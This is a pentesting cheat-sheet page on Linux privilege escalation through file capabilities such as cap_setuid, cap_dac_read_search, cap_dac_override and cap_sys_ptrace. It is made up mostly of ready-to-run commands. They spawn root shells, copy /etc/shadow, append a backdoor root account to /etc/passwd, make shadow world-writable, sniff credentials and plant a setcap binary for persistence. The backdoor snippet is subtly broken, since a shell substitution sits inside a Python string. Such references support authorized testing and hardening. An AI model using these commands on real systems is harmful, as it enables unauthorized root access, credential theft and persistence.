> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Capabilities

> Privilege escalation via Linux capabilities: cap_setuid, cap_dac_read_search, cap_net_raw, and more.

## Overview

Linux capabilities split root privileges into smaller units. A binary with specific capabilities can perform privileged operations without being SUID root.

***

## Find Binaries with Capabilities

```bash theme={"dark"}
getcap -r / 2>/dev/null
```

***

## Dangerous Capabilities

### cap\_setuid (ep)

Binary can change its UID → instant root.

#### python

```bash theme={"dark"}
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```

#### perl

```bash theme={"dark"}
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
```

#### ruby

```bash theme={"dark"}
ruby -e 'Process::Sys.setuid(0); exec "/bin/bash"'
```

#### php

```bash theme={"dark"}
php -r 'posix_setuid(0); system("/bin/bash");'
```

#### node

```bash theme={"dark"}
node -e 'process.setuid(0); require("child_process").spawn("/bin/bash", {stdio: [0,1,2]})'
```

***

### cap\_dac\_read\_search

Bypass file read permission checks. Read any file.

#### tar

```bash theme={"dark"}
tar czf /tmp/shadow.tar.gz /etc/shadow
tar xzf /tmp/shadow.tar.gz
cat etc/shadow
```

#### openssl (custom binary)

```bash theme={"dark"}
openssl enc -in /etc/shadow
```

***

### cap\_dac\_override

Bypass file write permission checks. Write to any file.

#### python

```python theme={"dark"}
import os
os.setuid(0)  # if also cap_setuid
# Or write directly
with open('/etc/passwd', 'a') as f:
    f.write('backdoor:$(openssl passwd -1 password):0:0::/root:/bin/bash\n')
```

#### vim

```bash theme={"dark"}
vim /etc/shadow
```

***

### cap\_chown

Change ownership of any file.

```bash theme={"dark"}
# If python has cap_chown
python3 -c 'import os; os.chown("/etc/shadow", 1000, 1000)'
cat /etc/shadow
```

***

### cap\_fowner

Bypass permission checks on file owner operations.

```bash theme={"dark"}
# Change permissions on any file
chmod 777 /etc/shadow
```

***

### cap\_net\_raw

Capture network traffic. Sniff credentials.

```bash theme={"dark"}
tcpdump -i any -w /tmp/capture.pcap
```

***

### cap\_net\_bind\_service

Bind to privileged ports (\< 1024). Useful for phishing/MitM.

```bash theme={"dark"}
python3 -m http.server 80
```

***

### cap\_sys\_ptrace

Attach to any process. Inject code into root process.

```bash theme={"dark"}
# Find root process
ps aux | grep root

# Inject shellcode via gdb or custom tool
python3 inject.py <ROOT_PID>
```

***

### cap\_sys\_admin

Mount filesystems, various admin operations.

```bash theme={"dark"}
mount /dev/sda1 /mnt
cat /mnt/etc/shadow
```

***

## Set Capabilities (If Root — Persistence)

```bash theme={"dark"}
cp /usr/bin/python3 /tmp/python3
setcap cap_setuid+ep /tmp/python3
```

Later:

```bash theme={"dark"}
/tmp/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```

***

## Quick Reference

| Capability            | Impact              | Exploit                       |
| --------------------- | ------------------- | ----------------------------- |
| `cap_setuid`          | Change UID to root  | `python3/perl/ruby` setuid(0) |
| `cap_dac_read_search` | Read any file       | `tar` to exfil /etc/shadow    |
| `cap_dac_override`    | Write any file      | Modify /etc/passwd            |
| `cap_chown`           | Own any file        | chown shadow to user          |
| `cap_fowner`          | chmod any file      | chmod 777 /etc/shadow         |
| `cap_net_raw`         | Sniff traffic       | tcpdump credentials           |
| `cap_sys_ptrace`      | Inject into process | Attach to root PID            |
| `cap_sys_admin`       | Mount filesystems   | Mount /dev/sda, read shadow   |
